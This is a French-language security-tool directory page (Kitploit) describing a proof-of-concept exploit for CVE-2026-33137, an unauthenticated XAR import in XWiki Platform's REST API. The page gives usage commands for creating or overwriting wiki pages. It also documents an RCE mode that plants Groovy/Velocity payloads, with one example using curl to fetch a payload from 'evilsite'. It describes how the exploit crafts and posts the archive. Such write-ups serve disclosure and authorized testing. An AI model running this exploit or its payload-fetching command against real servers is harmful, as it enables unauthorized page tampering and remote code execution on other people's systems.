Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33137 — # XWiki Platform - PoC CVE-2026-33137 - Import XAR non authentifié via REST /wikis/{wikiName} | Kitploit
Outils/GitHubGitHub/portbuster1337/cve-2026-33137
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

# XWiki Platform - PoC CVE-2026-33137 - Import XAR non authentifié via REST /wikis/{wikiName}

Voir le dépôt
44il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33137

XWiki Platform - Import XAR non authentifié via REST /wikis/{wikiName}

Description

Le point d'accès REST POST /wikis/{wikiName} de XWiki Platform exécute une importation XAR (XWiki Archive) sans effectuer aucune vérification d'authentification ou d'autorisation. Un attaquant non authentifié peut créer ou mettre à jour des documents arbitraires dans le wiki cible en envoyant un fichier XAR spécialement conçu.

  • CVE : CVE-2026-33137
  • CWE : CWE-862 Absence d'autorisation
  • CVSS 4.0 : 9.3 (Critique) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Publié : 2026-05-20

Versions affectées

StatutVersions
Vulnérable> 15.10.16, > 16.4.6, > 16.10.2
Corrigé16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Impact

Un attaquant non authentifié peut :

  • Créer des pages wiki arbitraires avec un contenu arbitraire
  • Écraser des pages wiki existantes
  • Potentiellement obtenir une exécution de code à distance (RCE) en créant des pages avec des scripts Velocity/Groovy malveillants (si le scripting est activé)

Détails

Le point d'accès REST POST /xwiki/rest/wikis/{wikiName} accepte un fichier XAR dans le corps de la requête et l'importe directement dans le wiki sans vérifier si le demandeur a les droits ADMIN. Le correctif (commit 4b7b95b) ajoute une vérification d'autorisation utilisant ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

Utilisation du PoC

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

Mode RCE (--rce)

Le paramètre --rce importe des pages contenant des payloads Groovy et Velocity qui exécutent la chaîne de commande spécifiée. Il automatise :

  1. Effectue une vérification préliminaire (détection de version, statut de la vulnérabilité, test du point d'accès XAR, accessibilité du chemin de déclenchement)
  2. Importe des pages avec la commande spécifiée intégrée dans les macros {{groovy}} et {{velocity}}
  3. Tente le rendu via l'API REST, l'interface Web et l'injection de type SSTI
  4. Rapporte quels chemins de déclenchement sont accessibles ou bloqués

Prérequis pour une RCE réussie :

  • La cible doit autoriser la visualisation des pages par les invités (ou des identifiants fournis via -u / --password)
  • Les droits de scripting/programmation doivent être activés pour l'utilisateur qui consulte
  • Les chemins de déclenchement ne doivent pas être bloqués par des redirections d'authentification

Fonctionnement de l'exploit

  1. Un fichier XAR (ZIP) minimal est construit contenant :
    • package.xml - descripteur du package
    • {Space}/{Page}.xml - document XML avec contenu
  2. Les octets du XAR sont envoyés en POST au point d'accès vulnérable
  3. Si vulnérable, le document est créé sans authentification
  4. Vérifie en option en relisant les métadonnées du document

Avertissement

Ce PoC est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce logiciel.

Références

  • GitHub Security Advisory GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (fix)
  • JIRA XWIKI-23953
  • NVD Entry
Télécharger l’outil